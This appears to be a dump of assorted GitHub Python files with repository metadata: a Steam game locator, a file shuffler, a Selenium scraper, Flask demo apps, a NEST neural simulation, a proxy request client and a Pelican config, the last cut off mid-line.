by https://github.com/LostDragonist/steam-library-setup-tool\n\nimport os\nimport winreg # type: ignore\n\nfrom pathlib import Path\nfrom typing import Dict\n\n\nclass SteamGame:\n def __init__(self, appid, installdir):\n self.appid = appid\n self.installdir = installdir\n\n def __repr__(self):\n return str(self)\n\n def __str__(self):\n return \"{} ({})\".format(self.appid, self.installdir)\n\n\nclass LibraryFolder:\n def __init__(self, path: str):\n self.path = path\n\n self.games = []\n for filename in os.listdir(os.path.join(path, \"steamapps\")):\n if filename.startswith(\"appmanifest\"):\n with open(\n os.path.join(path, \"steamapps\", filename), \"r\", encoding=\"utf-8\"\n ) as fp:\n i, n = None, None\n for line in fp:\n line = line.strip()\n\n if line.startswith('\"appid\"'):\n i = line.replace('\"appid\"', \"\").strip()[1:-1]\n if line.startswith('\"installdir\"'):\n n = line.replace('\"installdir\"', \"\").strip()[1:-1]\n\n if i is not None and n is not None:\n break\n if i is None or n is None:\n continue\n self.games.append(SteamGame(i, n))\n\n def __repr__(self):\n return str(self)\n\n def __str__(self):\n return \"LibraryFolder at {}: {}\".format(self.path, self.games)\n\n\ndef parse_library_info(library_vdf_path):\n\n library_folders = []\n\n with open(library_vdf_path, \"r\") as f:\n\n # Find the line containing \"LibraryFolders\" (quoted):\n it = iter(f)\n for line in it:\n\n line = line.strip().strip('\"')\n if line == \"LibraryFolders\":\n break\n\n # Find the opening {:\n for line in it:\n if line.strip() == \"{\":\n break\n\n # Read the folders:\n for line in it:\n line = line.strip()\n if line == \"}\":\n break\n\n # Strip \" on each side and split, we should get\n # 3 parts with an empty middle\n parts = line.strip('\"').split('\"')\n\n if len(parts) == 3 and not parts[1].strip():\n try:\n int(parts[0].strip())\n except ValueError:\n continue\n\n try:\n library_folders.append(\n LibraryFolder(parts[2].strip().replace(\"\\\\\\\\\", \"\\\\\"))\n )\n except (FileNotFoundError, ValueError):\n continue\n\n return library_folders\n\n\ndef find_games() -> Dict[str, Path]:\n try:\n with winreg.OpenKey(winreg.HKEY_CURRENT_USER, \"Software\\\\Valve\\\\Steam\") as key:\n value = winreg.QueryValueEx(key, \"SteamExe\")\n steam_path = value[0].replace(\"/\", \"\\\\\")\n except FileNotFoundError:\n return {}\n\n library_vdf_path = os.path.join(\n os.path.dirname(steam_path), \"steamapps\", \"libraryfolders.vdf\"\n )\n\n library_folders = parse_library_info(library_vdf_path)\n library_folders.append(LibraryFolder(os.path.dirname(steam_path)))\n\n games: Dict[str, Path] = {}\n for library in library_folders:\n for game in library.games:\n games[game.appid] = Path(library.path).joinpath(\n \"steamapps\", \"common\", game.installdir\n )\n\n return games\n\n\nif __name__ == \"__main__\":\n games = find_games()\n for k, v in games.items():\n print(\"Found game with id {} at {}.\".format(k, v))\n","repo_name":"Yoosk/modorganizer-basic_games","sub_path":"steam_utils.py","file_name":"steam_utils.py","file_ext":"py","file_size_in_byte":3707,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"22015415552","text":"#! /usr/bin/env python\n\"\"\"\nshuffle rows of a big file, rewrite to a new file\n\"\"\"\nimport argparse\nimport os\nimport gc\nimport numpy as np\n\n\ndef str2bool(v):\n # susendberg's function\n return v.lower() in (\"yes\", \"true\", \"t\", \"1\")\n\n\ndef count_line_num(sl_filepath, fheader=True):\n count = 0\n with open(sl_filepath, 'r') as rf:\n if fheader:\n next(rf)\n for line in rf:\n count += 1\n print('done count the lines of file..')\n return count\n\n\ndef read_one_shuffle_info(filepath, shuffle_lines_num, total_lines_num, checked_lines_num, isheader):\n with open(filepath, 'r') as rf:\n if isheader:\n next(rf)\n count = 0\n while count < checked_lines_num:\n next(rf)\n count += 1\n\n count = 0\n lines_info = []\n lines_num = min(shuffle_lines_num, (total_lines_num - checked_lines_num))\n for line in rf:\n if count < lines_num:\n lines_info.append(line.strip())\n count += 1\n else:\n break\n print('done reading file {}'.format(filepath))\n return lines_info\n\n\ndef shuffle_samples(samples_info):\n mark = list(range(len(samples_info)))\n np.random.shuffle(mark)\n shuffled_samples = []\n for i in mark:\n shuffled_samples.append(samples_info[i])\n return shuffled_samples\n\n\ndef write_to_one_file_append(features_info, wfilepath):\n with open(wfilepath, 'a') as wf:\n for i in range(0, len(features_info)):\n wf.write(features_info[i] + '\\n')\n print('done writing features info to {}'.format(wfilepath))\n\n\ndef caoncat_two_files(file1, file2, shuffle_lines_num, lines_num, concated_fp, isheader):\n open(concated_fp, 'w').close()\n\n if isheader:\n rf1 = open(file1, 'r')\n wf = open(concated_fp, 'a')\n wf.write(next(rf1))\n wf.close()\n rf1.close()\n\n f1line_count = count_line_num(file1, isheader)\n f2line_count = count_line_num(file2, False)\n\n line_ratio = float(f2line_count) / f1line_count\n shuffle_lines_num2 = round(line_ratio * shuffle_lines_num) + 1\n\n checked_lines_num1, checked_lines_num2 = 0, 0\n while checked_lines_num1 < lines_num or checked_lines_num2 < lines_num:\n file1_info = read_one_shuffle_info(file1, shuffle_lines_num, lines_num, checked_lines_num1, isheader)\n checked_lines_num1 += len(file1_info)\n file2_info = read_one_shuffle_info(file2, shuffle_lines_num2, lines_num, checked_lines_num2, False)\n checked_lines_num2 += len(file2_info)\n if len(file1_info) == 0 and len(file2_info) == 0:\n break\n samples_info = shuffle_samples(file1_info + file2_info)\n write_to_one_file_append(samples_info, concated_fp)\n\n del file1_info\n del file2_info\n del samples_info\n gc.collect()\n\n\ndef split_a_file_to_two_parts(filepath, header, temp_dir):\n filename = os.path.basename(filepath)\n\n f_linenum = count_line_num(filepath, header)\n head_num = int(f_linenum / 2)\n tail_num = f_linenum - head_num\n\n head_file_path = \"/\".join([temp_dir, filename + '.head.tmp'])\n tail_file_path = \"/\".join([temp_dir, filename + '.tail.tmp'])\n\n os.system('head -n ' + str(head_num) + ' ' + filepath + ' > ' + head_file_path)\n os.system('tail -n ' + str(tail_num) + ' ' + filepath + ' > ' + tail_file_path)\n\n return head_file_path, tail_file_path\n\n\ndef main():\n parser = argparse.ArgumentParser(description='shuffle rows of a LINE file. '\n 'The file must have no header')\n parser.add_argument('--fp', type=str, required=True,\n help='file path to be reshuffle')\n\n parser.add_argument('--num_samples_per_file', type=int, default=2000000000, required=False,\n help='num of samples per file, default 2000000000 (equal to Inf)')\n parser.add_argument('--num_lines_shuffle', type=int, default=3000000, required=False,\n help='num of lines for one shuffle, default 2000000')\n parser.add_argument('--header', type=str, default='no', required=False,\n help='whether there are headers in fp or not, this arg is DEPRECATED')\n parser.add_argument('--temp_dir', type=str, default=\"/tmp\",\n required=False, help=\"temp directory for saving temp files, default /tmp\")\n args = parser.parse_args()\n\n ori_fp = args.fp\n linenum = args.num_samples_per_file\n oneshufflenum = args.num_lines_shuffle\n\n header = str2bool(args.header)\n header = False\n\n temp_dir = args.temp_dir\n\n fname, fext = os.path.splitext(ori_fp)\n shuffled_file = fname + '.shuffle' + fext\n head_file_path, tail_file_path = split_a_file_to_two_parts(ori_fp, header, temp_dir)\n caoncat_two_files(head_file_path, tail_file_path, oneshufflenum, linenum, shuffled_file, header)\n\n os.remove(head_file_path)\n os.remove(tail_file_path)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"bioinfomaticsCSU/deepsignal","sub_path":"scripts/shuffle_a_big_file.py","file_name":"shuffle_a_big_file.py","file_ext":"py","file_size_in_byte":5009,"program_lang":"python","lang":"en","doc_type":"code","stars":101,"dataset":"github-code","pt":"43"} +{"seq_id":"37856744939","text":"from selenium import webdriver\nimport time\n\nclass Montana_Bot():\n def __init__(self, entity_name, chromedriver_location):\n self.entity_name = entity_name\n self.chromedriver_location = chromedriver_location\n\n def initializeSelenium(self, chromedriver_location):\n # calls createUrlFromName with input\n url = \"https://www.mtsosfilings.gov/mtsos-master/service/create.html?service=registerItemSearch\"\n\n # starts Selenium\n driver = webdriver.Chrome(executable_path=chromedriver_location)\n\n # get URL\n driver.get(url)\n\n return driver\n\n def findDetailsPage(self, driver, entity_name):\n # inputs information to search\n text = driver.find_element_by_xpath('//*[@id=\"QueryString\"]')\n text.send_keys(entity_name)\n temp = driver.find_elements_by_class_name('appReceiveFocus')\n submit = temp[2]\n submit.click()\n return driver\n\n def scrapeData(self, driver, fullDict):\n # finds and navigates to the link for the first entity\n time.sleep(4)\n temp = driver.find_elements_by_class_name('appReceiveFocus')\n link = temp[3]\n link.click()\n\n # assigns strings to keys and values for the dictionary depending on their position on the page\n keys = driver.find_elements_by_class_name('appAttrLabel')\n values = driver.find_elements_by_class_name('appAttrValue')\n for i in range(len(keys)):\n if keys[i].text == '':\n fullDict['Information']['Name'] = values[i].text\n elif keys[i].text.lower() == 'name':\n pass\n else:\n fullDict['Information'][keys[i].text] = values[i].text\n\n driver.quit()\n return fullDict\n\n def run_script(self):\n entity_name = self.entity_name\n chromedriver_location = self.chromedriver_location\n driver = self.initializeSelenium(chromedriver_location)\n fullDict = {\n 'Information': {}\n }\n driver = self.findDetailsPage(driver, entity_name)\n driver.implicitly_wait(3)\n return self.scrapeData(driver, fullDict)","repo_name":"jordanjhoff/Deepblocks-code","sub_path":"States/Montana/MT_scraper.py","file_name":"MT_scraper.py","file_ext":"py","file_size_in_byte":2148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"42638195763","text":"from flask import Flask, render_template, request\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, SubmitField, DateField, IntegerField, DecimalField, SelectField\n\napp = Flask(__name__)\n\napp.config['SECRET_KEY'] = 'YOUR_SECRET_KEY'\n\nclass BasicForm(FlaskForm):\n first_name = StringField('First Name')\n last_name = StringField('Last Name')\n date = DateField('DOB (D-M-Y)',format='%d-%m-%Y')\n Integer = IntegerField('Favouriate number')\n Float = DecimalField('choose a decimal from 0-1')\n Select = SelectField('Gender', choices=[(' '), ('Male'), ('Female')])\n submit = SubmitField('Submit')\n\n@app.route('/', methods=['GET', 'POST'])\n@app.route('/home', methods=['GET', 'POST'])\ndef register():\n error = \"\"\n form = BasicForm()\n\n if request.method == 'POST':\n first_name = form.first_name.data\n last_name = form.last_name.data\n date = form.date.data\n Integer = form.Integer.data\n Float = form.Float.data\n Select = form.Select.data\n\n if len(first_name) == 0 or len(last_name) == 0:\n error = \"Please supply both first and last name\"\n else:\n return 'Thank you ' + first_name +' '+ last_name +' '+ ' Favouraite number: ' + str(Integer) + ' & ' + str(Float)\n\n return render_template('home.html', form=form, message=error)\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0')\n","repo_name":"aaboungab/Flask-apps","sub_path":"Flask_CreatingForm/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"71612725571","text":"# Given a string with lowercase or uppercase letters only, if you are allowed to replace no more than ‘k’ letters with any letter, find the length of the longest substring having the same letters after replacement.\n\n# Examples\n\n# Input: String=\"aabccbb\", k=2\n# Output: 5\n# Explanation: Replace the two 'c' with 'b' to have a longest repeating substring \"bbbbb\".\n\n# Input: String=\"abbcb\", k=1\n# Output: 4\n# Explanation: Replace the 'c' with 'b' to have a longest repeating substring \"bbbb\".\n\n# Input: String=\"abccde\", k=1\n# Output: 3\n# Explanation: Replace the 'b' or 'd' with 'c' to have the longest repeating substring \"ccc\".\n\n# Input:\n# s = \"ABAB\", k = 2\n\n# Output:\n# 4\n\n# Explanation:\n# Replace the two 'A's with two 'B's or vice versa.\n\n\nclass Solution:\n\tdef characterReplacement(self, s, k):\n\t\tmaxLen, windowStart, maxRepeatingLetterCount = 0, 0, 0\n\t\tcharacterFrequency = {}\n\t\tfor windowEnd in range(len(s)):\n\t\t\trightChar = s[windowEnd]\n\t\t\tif rightChar not in characterFrequency:\n\t\t\t\tcharacterFrequency[rightChar] = 0\n\t\t\tcharacterFrequency[rightChar] += 1\n\t\t\tmaxRepeatingLetterCount = max(maxRepeatingLetterCount, characterFrequency[rightChar])\n\t\t\tif (windowEnd - windowStart + 1 - maxRepeatingLetterCount) > k:\n\t\t\t\tleftChar = s[windowStart]\n\t\t\t\tcharacterFrequency[leftChar] -= 1\n\t\t\t\twindowStart += 1\n\t\t\tmaxLen = max(maxLen, windowEnd - windowStart + 1)\n\t\treturn maxLen\n\nsolution = Solution()\nprint(solution.characterReplacement(\"abbcb\", 1))\n","repo_name":"kohli6010/leetcode","sub_path":"longestsubstringwithsamelettersafterreplacement.py","file_name":"longestsubstringwithsamelettersafterreplacement.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"13527343905","text":"class Solution:\n def process_input(self, strs):\n self.weights = []\n for s in strs:\n c_s = Counter(s)\n self.weights.append((c_s.get('0', 0), c_s.get('1', 0)))\n \n def run(self,m,n,idx,L):\n if idx < 0 or idx == L or m<0 or n<0:\n return 0\n key = (m,n,idx)\n if key in self.table:\n return self.table[key]\n a,b = self.weights[idx]\n first = 0\n if m-a >= 0 and n-b>=0:\n first = 1 + self.run(m-a, n-b, idx-1,L)\n second = self.run(m,n, idx-1,L)\n \n self.table[key] = max(first, second)\n return self.table[key]\n \n def findMaxForm(self, strs: List[str], m: int, n: int) -> int:\n self.process_input(strs)\n self.table = {}\n ans = self.run(m, n, len(self.weights)-1, len(self.weights))\n return ans","repo_name":"RishitToteja/Leetcode-Questions","sub_path":"474-ones-and-zeroes/474-ones-and-zeroes.py","file_name":"474-ones-and-zeroes.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"30731720450","text":"class Human:\n def __init__(self, name, surname, age):\n self.name = name\n self.surname = surname\n self.age = age\n\n def allowed_in_the_club(self):\n if self.age >= 18:\n return True\n return False\n\n def __repr__(self):\n return f'''\n Name:\\t\\t{self.name}\n Surname:\\t{self.surname}\n Age:\\t\\t{self.age}\n ''' \n\nprint('Enter Person(s) Details and enter \"exit\" to stop\\n\\n')\nflag = True\ncount = 1\npeople = []\n\nwhile flag:\n print(f\"person {count}'s details\")\n try:\n name = input('Name:\\t\\t')\n surname = input('Surname:\\t')\n age = int(input('Age:\\t\\t'))\n \n person = Human(name, surname, age)\n people.append(person)\n\n print('\\n')\n answer = input('continue? (type exit to stop)\\t')\n print('\\n\\n')\n\n if answer.lower() == 'exit':\n flag = False\n continue\n count += 1\n\n except ValueError as e:\n print(e)\nif count > 1:\n print(f'These are the {count} people going to the club')\nelif count == 0:\n print('There are not people going to the club')\nelse:\n print('Error') \nfor person in people:\n print(person.__repr__()+f'Allowed in:\\t{person.allowed_in_the_club()}\\n\\n')\n\n\n","repo_name":"Mesh542/Unit-Testing-in-Python","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"39883681487","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 4 17:49:10 2018\nThis script allows to create a neural network, save the spike times and the \ndata recorded by a \"digital\" multimeter. \n@author: Max\n\"\"\"\n#into console: %reset -f\nprint(__doc__)\nfrom pathlib import Path\nimport sys\nimport nest\nimport numpy as np\nimport nest.topology as topp\nfrom create_spike_times_methods import get_data\nfrom create_spike_times_methods import time_series_split\nfrom create_spike_times_methods import spike_times_split\n#from create_fluorescent_data_functions import SimulationParameters\n#from create_fluorescent_data_functions import NeuralModelParameters\nimport scipy.io as sio\n\ndef create_spike_times(Sim, NModel):\n \n if Sim.overwrite_files == \"no\":\n if Sim.data_folder.is_dir()==True:\n print(\"You are not allowed to overwrite the files.\")\n sys.exit(\"Error message\")\n else:\n Sim.data_folder.mkdir(parents=True)\n elif Sim.overwrite_files == \"yes\":\n if Sim.data_folder.is_dir()==True:\n print(\"You have overwritten old files.\")\n else:\n Sim.data_folder.mkdir(parents=True)\n else:\n print(\"You have two options for overwrite files\")\n \n connections_path = Sim.data_folder / \"connections.txt\"\n spikes_path = Sim.data_folder / \"spikes.mat\"\n spikes_split_path = Sim.data_folder / \"spikes_split.mat\"\n multimeter_data_path = Sim.data_folder / \"multimeter_data.mat\"\n hyperparameters_path = Sim.data_folder / \"hyperparameters.mat\"\n position_path = Sim.data_folder / \"position.mat\"\n \n # Define important simulation parameters\n nest.ResetKernel()\n seed=1008.0\n nest.SetKernelStatus({\"resolution\": Sim.resolution,\n \"print_time\": True,\n \"overwrite_files\":True,\n \"grng_seed\": int(seed),\n \"rng_seeds\": [int(seed)]\n })\n \n # Construct the position grid of the neural network(NN)\n jit = 0.03\n if NModel.nr_neurons==100:\n xs = np.arange(-0.45,.451,0.1) # defines the size of the network\n elif NModel.nr_neurons==16:\n xs = np.arange(-0.15,.151,0.1)\n else:\n print(\"Current network can constitute of 16 or 100 neurons.\")\n np.random.seed(int(seed))\n pos = [[x,y] for y in xs for x in xs]\n pos = [[p[0]+np.random.uniform(-jit,jit),p[1]+np.random.uniform(-jit,jit)] for p in pos]\n \n # Construct the neurons on the grid and establish connections between them.\n # The probabilty of connection varies with the distance between the neurons\n # Define synapse connections\n nest.SetDefaults(\"tsodyks_synapse\",{\"delay\": NModel.t_delay, #1.5 in Stetter's code\n \"tau_rec\": NModel.tau_rec,\n \"tau_fac\":0.0,\n \"U\": NModel.U\n })\n conn1 = { \"connection_type\":\"divergent\",\n \"mask\": {\"circular\":{\"radius\":0.75}},\n \"kernel\": {\"gaussian\":{\"p_center\":1.,\"sigma\":0.15}}, #0.15 for 100 neurons\n \"allow_autapses\":False,\n \"synapse_model\":\"tsodyks_synapse\",\n \"weights\": NModel.alpha_int\n }\n \n # specify the neural model\n neuron_param= {\n #\"I_e\" : 0.0,\n \"C_m\" : 1.0,\n \"tau_m\" : NModel.tau_m,\n \"t_ref\" : NModel.tau_s, #refactory periods in ms 2.0 is default\n \"E_L\" : 0.0,\n \"V_th\" : NModel.V_thres,\n \"V_m\" : 0.0,\n \"V_reset\" : 0.0\n }\n nest.SetDefaults(\"iaf_psc_alpha\", neuron_param)\n \n layer_dict_ex = {\"positions\": pos,\n \"extent\" : [1.1,1.1],\n \"elements\" : \"iaf_psc_alpha\"}\n layer = topp.CreateLayer(layer_dict_ex)\n \n topp.ConnectLayers(layer,layer,conn1)\n \n # Plot layer\n topp.PlotLayer(layer)\n \n # change the seed for different Poisson spike trains\n nest.SetKernelStatus({\n 'grng_seed': int(seed),\n 'rng_seeds': [int(seed)]\n })\n \n # Creation of a poisson generator\n nest.CopyModel('poisson_generator', 'PG',\n params={'rate': NModel.poisson_spike_rate}) #1.6 in the paper, I don't know why they changed it in the programm\n pg = topp.CreateLayer({ 'rows' : 1,\n 'columns' : 1,\n 'elements' : 'PG'})\n cdict_stim = {'connection_type' : 'divergent',\n 'weights': NModel.alpha_ext}\n topp.ConnectLayers(pg,layer,cdict_stim)\n \n # create multimeter\n nrns=nest.GetLeaves(layer,local_only=True)[0]\n multimeter = nest.Create(\"multimeter\", NModel.nr_neurons)\n nest.SetStatus(multimeter, {\"withtime\":True, \"record_from\":[\"V_m\",\"I_syn_ex\"],\"interval\":Sim.interval}) #, \"input_currents_ex\",\"input_currents_in\"\n nest.Connect(multimeter,nrns,\"one_to_one\")\n \n # Create spike detector\n sd1 = nest.Create('spike_detector')\n nest.SetStatus(sd1,{'precise_times':True})\n nest.Connect(nrns,sd1)\n \n # Simulate\n nest.Simulate(Sim.sim_length + Sim.interval)\n \n # Retrieve the generated data\n [potential,currents_ex,spikes,time]=get_data(multimeter,sd1,NModel.nr_neurons,Sim.nr_samples)\n \n # Save the spikes to a file\n spikesdict={'N1':spikes}\n sio.savemat(str(spikes_path),spikesdict)\n \n if Sim.P>1:\n potential_fin = time_series_split(potential,Sim.P)[0]\n currents_ex_fin = time_series_split(currents_ex,Sim.P)[0]\n spikesdict_split = spike_times_split(spikes, Sim.sim_length, Sim.P)\n else:\n potential_fin=potential\n currents_ex_fin=currents_ex\n spikesdict_split = {'N1':spikes}\n \n # Pass important hyperparameters to create_fluorescent_data_from_spike_times.py\n hyperdict = {\n 'P' : Sim.P,\n 'length_ts' : Sim.length_ts,\n 'nr_samples' : Sim.nr_samples,\n 'nr_neurons' : NModel.nr_neurons,\n 'interval' : Sim.interval\n \n }\n sio.savemat(str(hyperparameters_path),hyperdict)\n # save the position\n sio.savemat(str(position_path), {'position' : pos})\n\n # save the results\n sio.savemat(str(multimeter_data_path),mdict={ 'potential' : potential_fin,\n 'input_currents_ex': currents_ex_fin\n })\n sio.savemat(str(spikes_split_path),spikesdict_split)\n \n topp.DumpLayerConnections(layer,'tsodyks_synapse',str(connections_path))","repo_name":"stieberm/inference_BNN","sub_path":"create_spike_times.py","file_name":"create_spike_times.py","file_ext":"py","file_size_in_byte":6751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"44925806613","text":"from requests.auth import HTTPProxyAuth\n\nfrom utils.proxy_utils.proxy import Proxy, ua\nimport requests\nimport config\n\n\nclass ReqestClient(Proxy):\n def __init__(self):\n super().__init__()\n\n def request_with_proxy_header(self, url):\n header = {'User-Agent': ua.user_agent()}\n\n if config.USE_PROXY_SERVER:\n proxy = self.generate_proxy()\n auth = HTTPProxyAuth(\"\", \"\")\n try:\n response = requests.get(url, proxies=proxy, auth=auth, headers=header, timeout=20, verify=True)\n return response\n except:\n # remove the invalid proxy from the proxy list and update in the file\n self.proxy_list.remove(proxy.get(\"http\"))\n self.write_proxy_list()\n else:\n try:\n response = requests.get(url, headers=header, timeout=20, verify=True)\n except:\n response = None\n\n return response\n\n\nif __name__ == '__main__':\n cli = ReqestClient()\n print(cli.request_with_proxy_header(\"https://www.wikipedia.org/\").text)\n","repo_name":"MLArtist/WebScraper","sub_path":"webscraper/utils/request_client.py","file_name":"request_client.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"43"} +{"seq_id":"11959550068","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ne = 0.5\nk = 1\nk1 = 1\nk2 = 1\ng = 1\nphi = 1\nD = 1\n\nn = 1\n\nF = lambda x: 1 - e*(1 + np.power(k2/k1*np.power(x,-1) + 1 + g*phi/k1, -1))\n\nG = lambda x: phi/k/n*(1+g*x)*(1+(k+g*phi)/D*x)\n\ny = lambda x: n/(1 + (k + g*phi)/D*x)\n\n#F = lambda x: -k*e*y(x)/(k1*k2/(k2+g*phi*x) - (k1+g*phi))\n\n#G = lambda x: (phi*(1+g*x)-k*(1-e)*y(x))/(k1*k2/(k2+g*phi*x) - k1)\n\nx = np.linspace(0.01, 1)\nplt.plot(x, F(x))\nplt.plot(x, G(x))\n#plt.xlim(0,1)\n#plt.ylim(0,)\nplt.show()","repo_name":"saishun01/texreport1","sub_path":"riroen2/steady_state.py","file_name":"steady_state.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"29988680551","text":"import random\nimport re\n\n\n#ready_nodes = [\"control-plane\", \"slave-one\", \"slave-two\"]\n#print(ready_nodes[0])\n#print(ready_nodes[1])\n#print(ready_nodes[2])\n\ndef _get_ready_nodes():\n ready_nodes = [\"control-plane\", \"slave-one\", \"slave-two\"]\n\n return ready_nodes\n\n\ndef _get_schedulable_node():\n node_list = _get_ready_nodes()\n\n #print(node_list[0])\n if not node_list:\n return None\n available_nodes = list(set(node_list))\n\n #print(available_nodes)\n\n\n # QUESTA E' LA FUNZIONE CHE DEVO SOSTITUIRE NELL'ALTRO CODICE (DA PROVARE)\n # IN QUESTO MODO INVECE DI RESTITUIRE UN NODO RANDOMICO A CUI ASSOCIARE IL POD\n # SCELGO UN NODO SPECIFICO IN BASE AL NOME CHE DO IO.\n # QUINDI VIENE FATTA UN MATCHING TRA NOME CHE DO IO E IL NOME DEL NODO\n # CHE SI TROVA NELL'ARRAY CREATO IN PRECEDENZA (DEI NODI DISPONIBILI).\n specific_node = [item for item in available_nodes\n if re.search(\"slave-one\", item) is not None]\n\n #my_string = \" \".join(my_sentence)\n\n node = \" \".join(specific_node)\n\n return node\n\n\nprint(_get_ready_nodes())\nprint(_get_schedulable_node())","repo_name":"lors10/PythonExemples","sub_path":"funzioni-k8s-v1.py","file_name":"funzioni-k8s-v1.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"39478040135","text":"from flask import Flask, render_template,request\nimport os\nfrom PIL import Image\nimport pytesseract\n\napp=Flask(__name__)\nbasedir = os.path.abspath(os.path.dirname(__file__))\n@app.route(\"/\")\ndef hello_world():\n result_text = \"xxxxxx\"\n return render_template('index.html',result = result_text)\n\n@app.route(\"/up_photo\",methods=['POST'])\ndef up_photo():\n img = request.files.get('txt_photo')\n path = basedir\n file_path=path+\"/\"+ img.filename\n img.save(file_path)\n text=pytesseract.image_to_string(Image.open(file_path), lang='chi_sim')\n print(file_path)\n print(\"in up photo\")\n return \"success:\" + text\n\n@app.route(\"/upphoto\",methods=['post'])\ndef upphoto():\n img = request.files.get('txt_photo')\n path = basedir\n file_path=path + \"/\"+img.filename\n img.save(file_path)\n text=pytesseract.image_to_string(Image.open(file_path), lang='chi_sim')\n return render_template('index.html',result=text)\n\nif __name__ == '__main__':\n app.run(debug=True,host='0.0.0.0',port=int(os.environ.get('PORT', 8080)))\n\n","repo_name":"mayidudu/jnocr","sub_path":"data/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"39233282406","text":"import json\nimport os\n\n# Get the absolute path of the directory where params.py is located\ndir_path = os.path.dirname(os.path.abspath(__file__))\n\n# Construct the absolute path for params.json\nparams_file_path = os.path.join(dir_path, \"params.json\")\n\nwith open(params_file_path, \"r\") as f:\n params = json.load(f)\n\nALIAS_LENGTH = params[\"ALIAS_LENGTH\"]\nPUBKEY_LENGTH = params[\"PUBKEY_LENGTH\"]\nSIG_LENGTH = params[\"SIG_LENGTH\"]\nNYM_MAX_LENGTH = params[\"NYM_MAX_LENGTH\"]\nINDICATOR_LEN = params[\"INDICATOR_LEN\"]\nHEADER_LENGTH = params[\"HEADER_LENGTH\"]\nEPOCH_TIME = params[\"EPOCH_TIME\"]\nSLACK_EPOCHS = params[\"SLACK_EPOCHS\"]\nFORWARD_SLACK_EPOCHS = params[\"FORWARD_SLACK_EPOCHS\"]\nSYNC_EPOCHS = params[\"SYNC_EPOCHS\"]\nDB_INT_LENGTH = params[\"DB_INT_LENGTH\"]\nRESET = params[\"RESET\"]\nSEQUENCER_IP = params[\"SEQUENCER_IP\"]\nSEQUENCER_PORT = params[\"SEQUENCER_PORT\"]\nSEQUENCER_PUBKEY = params[\"SEQUENCER_PUBKEY\"]\n\nDELAY = FORWARD_SLACK_EPOCHS+1+SLACK_EPOCHS+SYNC_EPOCHS\nMAX_MESSAGE_LENGTH = 2**12-1#-ALIAS_LENGTH*2-DB_INT_LENGTH\nPARENT_LENGTH = ALIAS_LENGTH+DB_INT_LENGTH\n\nRUN_EXTERNALLY = True","repo_name":"SirLemmings/SemaphoreV0","sub_path":"params.py","file_name":"params.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"7574648289","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\nfrom __future__ import unicode_literals\nfrom datetime import date\n\nAUTHOR = u'Alessandro Tanasi'\nSITENAME = u\"Alessandro Tanasi @jekil's blog\"\nSITETITLE = u\"jekil's blog\"\nSITESUBTITLE = u\"%s's thoughts\" % AUTHOR\nSITEDESCRIPTION = '%s\\'s Thoughts and Writings' % AUTHOR\nSITELOGO = '//en.gravatar.com/userimage/1102835/a961dde28318778e338efdf517ea68cb.png?size=120'\nROBOTS = 'index, follow'\n\n# Paths.\nPATH = 'content'\nSTATIC_PATHS = ['images', 'public', 'static']\nARTICLE_PATHS = ['blog']\nARTICLE_SAVE_AS = 'blog/{date:%Y}/{slug}.html'\nARTICLE_URL = 'blog/{date:%Y}/{slug}.html'\nPAGE_URL = 'pages/{slug}/'\nPAGE_SAVE_AS = 'pages/{slug}/index.html'\nDELETE_OUTPUT_DIRECTORY = False\nOUTPUT_RETENTION = ['.git']\n\n# Style.\nTHEME = \"pelican-themes/flex\"\nBROWSER_COLOR = '#333'\nPYGMENTS_STYLE = 'github'\nTYPOGRIFY = True\nSUMMARY_MAX_LENGTH = 100\n#DOCUTILS_SETTINGS = {'doctitle_xform': False }\n\n# Locals.\nTIMEZONE = 'Europe/London'\nDEFAULT_LANG = u'en'\nOG_LOCALE = 'en_US.UTF-8'\nLOCALE = 'en_US.UTF-8'\nDATE_FORMATS = {\n 'en': '%B %d, %Y',\n}\nDEFAULT_PAGINATION = 5\n\n# Debug options.\nLOAD_CONTENT_CACHE = False\nUSE_LESS = True\n\n# Blog conf.\nMAIN_MENU = True\nLINKS_IN_NEW_TAB = 'external'\nUSE_FOLDER_AS_CATEGORY = False\nEXTRA_PATH_METADATA = {\n 'static/robots.txt': {'path': 'robots.txt'},\n 'static/favicon.ico': {'path': 'favicon.ico'},\n 'static/CNAME': {'path': 'CNAME'},\n 'static/.well-known/security.txt': {'path': '.well-known/security.txt'},\n}\nDEFAULT_METADATA = {\n 'status': 'draft',\n}\nCOPYRIGHT_YEAR = date.today().year\n\n# Feeds.\nFEED_DOMAIN = 'http://feeds.feedburner.com'\nFEED_ALL_ATOM = 'jekil_is_sexy'\nCATEGORY_FEED_ATOM = 